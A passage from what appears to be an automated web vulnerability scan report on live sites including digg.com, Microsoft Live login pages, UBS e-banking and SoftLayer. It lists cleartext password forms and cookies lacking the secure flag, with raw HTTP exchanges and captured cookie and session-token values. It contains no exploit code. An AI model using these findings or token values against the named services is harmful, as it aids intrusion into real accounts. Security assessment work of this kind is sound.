GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 197a8481-8887-45ea-8ece-afbd16506d13
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 11:16:21 GMT; path=/
Set-Cookie: sc_clustbl_142=b74b373a208052d8; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC626 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

5. Cleartext submission of password previous next
There are 10 instances of this issue:

http://digg.com/
http://digg.com/login
http://digg.com/login
http://digg.com/register
http://digg.com/register
http://digg.com/search
http://digg.com/submit
http://digg.com/topic
http://digg.com/upcoming
http://manage.softlayer.mobi/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://digg.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.2. http://digg.com/login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/ajax/auth/prepare/digg

The form contains the following password field:

password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.3. http://digg.com/login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/login

The form contains the following password field:

password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.4. http://digg.com/register previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/ajax/auth/register

The form contains the following password field:

password-register

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="register" method="post" action="/ajax/auth/register" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password-register" id="password-register" class="text-input placeholder-input" tabindex="3">
</span>
...[SNIP]...

5.5. http://digg.com/register previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/register

The form contains the following password field:

password

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.6. http://digg.com/search previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/search

The form contains the following password field:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.7. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx

The form contains the following password field:

password

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

5.8. http://digg.com/topic previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/topic

The form contains the following password field:

password

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.9. http://digg.com/upcoming previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/upcoming

The form contains the following password field:

password

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.10. http://manage.softlayer.mobi/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://manage.softlayer.mobi
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://manage.softlayer.mobi/index/index?cacheKey=

The form contains the following password field:

data[User][password]

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
Content-Length: 1832
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>SoftLayer - Mobile Portal Login</title>
<link rel="stylesheet" type="text/css
...[SNIP]...
<center>
<form id="index_form" name="data[index][index?cacheKey=]_form" action="http://manage.softlayer.mobi/index/index?cacheKey=" method="post"> <center>
...[SNIP]...
<BR>
<input type="password" id="user_password" name="data[User][password]" style="font-size:x-small" class="logintext" tabIndex="2" size="10" /><BR>
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 12 instances of this issue:

https://accountservices.passport.net/gethip.srf
https://ebanking.ubs.com/en/
https://live.zune.net/xweb/passport/bottomCB.aspx
https://live.zune.net/xweb/passport/rightCB.aspx
https://live.zune.net/xweb/passport/topCB.aspx
https://login.live.com/login.srf
https://login.live.com/pp1100/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.live.com/resetpw.srf
https://msnia.login.live.com/ppsecure/post.srf
https://quotes-public.ubs.com/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://accountservices.passport.net/gethip.srf previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://accountservices.passport.net
Path:	/gethip.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

6.2. https://ebanking.ubs.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ebanking.ubs.com
Path:	/en/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/ HTTP/1.1
Host: ebanking.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/1/e/online.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:59:55 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly
Connection: close
Location: https://ebanking1.ubs.com:443/en/?NavLB_EB=1309960795
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 286
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.4. https://live.zune.net/xweb/passport/rightCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
supportedTuner=Undefined; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.5. https://live.zune.net/xweb/passport/topCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.6. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

6.7. https://login.live.com/pp1100/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp1100/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.8. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.9. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.10. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
MSPBack=1309951135; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.11. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.12. https://quotes-public.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://quotes-public.ubs.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

7. Session token in URL previous next
There are 3 instances of this issue:

/
/Sales/orderComputingInstance
/index/index

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

